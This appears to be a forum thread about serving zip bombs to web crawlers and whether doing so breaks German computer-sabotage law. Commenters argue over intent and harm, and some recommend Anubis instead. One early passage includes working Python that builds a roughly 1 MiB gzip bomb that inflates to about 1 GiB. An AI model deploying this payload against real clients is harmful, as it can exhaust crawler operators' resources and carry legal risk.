The majority of the traffic on the web is from bots. For the most part, these bots are used to discover new content. These are RSS feed readers, search engines crawling your content, or, nowadays, AI bots.
A crawler is a data processing machine, nothing more. Therefore, you are disrupting data processing through data. If you think it's not, that's okay too.
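To make concrete what "disrupting data processing through data" looks like, here is a minimal sketch, assuming Python; the `make_gzip_bomb` name and the sizes are just illustrative choices, not anything from the article. It builds a small gzip stream that inflates to about a gigabyte of zero bytes when a crawler naively decompresses it.

```python
import gzip
import io

# Sketch of the kind of payload being discussed: a tiny gzip stream that a
# crawler's decompression step inflates into ~1 GiB of zero bytes.
# Zero bytes compress extremely well, so the wire size stays around 1 MiB.
def make_gzip_bomb(inflated_size: int = 1024**3, chunk: int = 1024**2) -> bytes:
    buf = io.BytesIO()
    with gzip.GzipFile(fileobj=buf, mode="wb", compresslevel=9) as gz:
        zeros = b"\x00" * chunk
        for _ in range(inflated_size // chunk):
            gz.write(zeros)
    return buf.getvalue()

if __name__ == "__main__":
    payload = make_gzip_bomb()
    # Served with "Content-Encoding: gzip", the client does the inflating.
    print(f"compressed payload: {len(payload)} bytes")
```

The point is the asymmetry: the server ships a megabyte or so, and the cost lands almost entirely on the client's decompression step.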
Nah, it's definitely disrupting data processing, even if at a very low-key level – you're not causing any data to become invalid or such. It's the intent to harm the operator that's the linchpin: "Jemandem einen Nachteil zufügen" ("inflicting a disadvantage on someone"). "Jemand" (someone) needs to be a person, natural or legal. And by stopping a crawler you don't want to inflict a disadvantage on the operator; you want to, at most, stop them from gaining an advantage. "Inflict a disadvantage" and "prevent an advantage" are two different things.
I would still advise contacting your lawyer in Germany if you are thinking about hosting a zip bomb.
Good idea, but as already said before: first you should contact a sysadmin – who will tell you it's a stupid idea.
"Jemand" could be the owner of the company; furthermore, (5) explicitly mentions companies, so this is kind of a void argument.
I mean, I never argued against that; like you already posted, Anubis is a way better option and not against German law AFAIK.